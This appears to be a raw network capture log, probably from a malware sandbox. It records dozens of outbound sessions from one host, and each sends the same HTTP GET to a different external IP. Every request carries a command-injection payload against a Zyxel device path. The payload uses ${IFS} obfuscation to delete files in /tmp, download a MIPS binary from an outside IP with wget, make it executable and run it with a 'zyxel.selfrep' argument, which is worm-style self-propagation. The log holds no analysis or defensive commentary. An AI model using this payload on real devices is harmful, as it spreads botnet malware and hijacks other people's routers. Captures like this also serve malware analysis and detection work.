                                                Jan 12, 2024 18:16:15.257452011 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2503192.168.2.235177289.219.213.232443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:15.257484913 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2504192.168.2.2344888217.89.55.47443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:15.257527113 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2505192.168.2.236074078.72.93.252443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:15.257550955 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2506192.168.2.234129859.160.139.100443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:15.257618904 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2507192.168.2.2340920219.223.8.69443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:15.257673025 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2508192.168.2.234373643.31.81.13443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:15.257730007 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2509192.168.2.23424245.226.57.213443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:15.257781982 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2510192.168.2.2348626102.87.13.215443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:15.257805109 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2511192.168.2.2338352186.65.82.161443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:15.257855892 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2512192.168.2.233513046.232.203.128443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:15.257917881 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2513192.168.2.2359664210.105.147.60443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:15.257973909 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2514192.168.2.2338712171.115.66.136443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:15.258001089 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2515192.168.2.2340562216.205.97.62443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:15.258049011 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2516192.168.2.2348556201.201.202.104443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:15.258078098 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2517192.168.2.2349158181.93.51.212443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:15.258127928 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2518192.168.2.2346792184.46.219.19443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:15.258173943 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2519192.168.2.235035889.180.94.222443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:15.258193016 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2520192.168.2.2349836211.252.143.49443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:15.258250952 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2521192.168.2.2354738189.30.214.92443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:15.258285999 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2522192.168.2.2356338113.128.118.209443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:15.258323908 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2523192.168.2.2356404124.55.67.189443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:15.258383036 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2524192.168.2.235009444.143.86.201443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:15.258400917 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2525192.168.2.2342754143.130.87.244443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:15.258459091 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2526192.168.2.2337094134.178.240.91443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:15.258491039 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2527192.168.2.2332956208.159.252.240443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:15.258513927 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2528192.168.2.2351394136.164.65.23443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:15.258560896 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2529192.168.2.2358998120.107.146.71443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:15.258615971 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2530192.168.2.233900296.48.222.92443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:15.258644104 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2531192.168.2.233714450.122.209.248443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:15.258693933 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2532192.168.2.2346622167.8.5.30443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:15.258718014 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2533192.168.2.234544087.17.29.33443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:15.258749962 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2534192.168.2.2352936124.48.26.15443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:15.258763075 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2535192.168.2.234888625.11.129.227443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:15.258809090 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2536192.168.2.2341328101.108.207.102443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:15.258851051 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2537192.168.2.2344676162.230.116.94443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:15.258884907 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2538192.168.2.2333486149.253.34.186443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:15.258912086 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2539192.168.2.2344500106.20.205.83443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:15.258986950 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2540192.168.2.233588641.32.8.193443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:15.259018898 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2541192.168.2.234896625.153.203.111443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:15.259051085 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2542192.168.2.2335108116.231.57.222443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:15.259104013 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2543192.168.2.234592658.127.237.135443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:15.259136915 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2544192.168.2.234463868.65.38.102443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:15.259167910 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2545192.168.2.2341742213.58.83.248443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:15.259216070 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2546192.168.2.235426048.79.216.54443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:15.259251118 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2547192.168.2.2347894153.182.52.228443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:15.259289026 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2548192.168.2.2359226143.108.42.68443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:15.259321928 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2549192.168.2.2339936206.179.37.11443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:15.259346008 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2550192.168.2.235922052.233.39.214443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:15.259402990 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2551192.168.2.2349440135.228.23.82443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:15.259430885 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2552192.168.2.233899259.246.241.49443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:15.259476900 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2553192.168.2.235440839.56.5.6443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:15.259505033 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2554192.168.2.2337898195.53.172.75443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:15.259531975 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2555192.168.2.2353288144.47.178.112443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:15.259581089 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2556192.168.2.234542489.68.227.216443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:15.259618044 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2557192.168.2.2338066150.134.238.149443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:15.259674072 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2558192.168.2.2351310144.53.96.179443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:15.259712934 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2559192.168.2.233872412.212.215.23443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:15.259738922 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2560192.168.2.2342276208.119.229.41443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:15.259763956 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2561192.168.2.2352218201.116.4.39443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:15.259820938 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2562192.168.2.2356856207.132.70.69443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:15.259854078 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2563192.168.2.2342414206.181.99.196443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:15.259900093 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2564192.168.2.2338200213.101.92.142443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:15.259943008 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2565192.168.2.235867813.250.79.199443
                                                TimestampBytes transferredDirectionData
